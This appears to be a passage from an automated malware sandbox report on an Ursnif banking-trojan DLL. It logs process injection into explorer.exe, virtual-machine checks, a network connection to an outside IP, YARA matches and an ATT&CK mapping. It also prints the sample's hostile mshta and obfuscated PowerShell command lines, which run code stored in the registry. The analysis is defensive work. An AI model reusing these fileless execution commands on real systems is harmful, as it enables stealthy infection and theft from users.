                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5391Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2401Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B665C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_05B665C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B699BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_05B699BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B7BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_05B7BAD1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B6FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,3_2_05B6FD47
                      Source: explorer.exe, 00000022.00000000.521128576.00000000051AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 00000022.00000000.483712623.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000022.00000000.475309894.0000000005EAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000022.00000000.483712623.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: rundll32.exe, 00000003.00000002.506846492.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.385751569.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.507972580.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.370432738.0000000000F55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000022.00000000.521196598.00000000051D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: RuntimeBroker.exe, 00000029.00000003.603288359.000001F9B9A60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000022.00000000.520867961.000000000514F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B6EC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,3_2_05B6EC00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B68FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,3_2_05B68FEC

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 176.10.119.68 80Jump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF620E112E0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 8A0000Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF620E112E0Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 370000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 24D0000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 36C000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 24A0000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8B62287000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Changes memory attributes in foreign processes to executable or writable
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute readJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: 8A0000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 24A0000 protect: page execute and read and writeJump to behavior
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 370000 value: 00Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EBJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 24D0000 value: 80Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 36C000 value: 00Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EBJump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 24A0000 value: 80Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40Jump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 6364Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3616Jump to behavior
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3616Jump to behavior
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580Jump to behavior
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 2BC1580
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cwbm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cwbm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBB61.tmp" "c:\Users\user\AppData\Local\Temp\rn2v1u0v\CSCE8729092494447E68BAFD2B3DE7C4FE.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDBAB.tmp" "c:\Users\user\AppData\Local\Temp\0rxpcrxp\CSC81748258BEC6426288BE9680C960B04E.TMP"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 00000022.00000000.523335281.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000000.463731939.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.516198461.0000000005E64000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000022.00000000.511545819.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000000.492179695.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000000.463353335.00000000005C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000022.00000000.463731939.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.472145226.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.512176237.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: explorer.exe, 00000022.00000000.463731939.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.472145226.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.512176237.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01003365 cpuid 3_2_01003365
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B781F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,3_2_05B781F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01004B89 SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep,3_2_01004B89
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01006D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_01006D78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01003365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_01003365

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.324102664.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323570193.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.375616313.000000000509C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323251316.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373340776.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322813142.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.324135232.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322932603.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.370749098.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323857679.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323438533.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4452, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6364, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.505479603.0000000004B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.508865065.0000000004F1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.449708876.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.447845466.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.446537800.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373077205.000000000519A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373165051.0000000005219000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.324102664.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323570193.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.375616313.000000000509C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323251316.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373340776.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322813142.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.324135232.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322932603.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.370749098.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323857679.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.323438533.0000000005298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4452, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6364, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.505479603.0000000004B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.508865065.0000000004F1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.449708876.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.447845466.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.446537800.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373077205.000000000519A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373165051.0000000005219000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      1
                      Valid Accounts                      		1
                      Windows Management Instrumentation                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Obfuscated Files or Information                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts1
                      Native API                      		Boot or Logon Initialization Scripts1
                      Access Token Manipulation                      		1
                      File Deletion                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		Exfiltration Over Bluetooth2
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)813
                      Process Injection                      		1
                      Masquerading                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
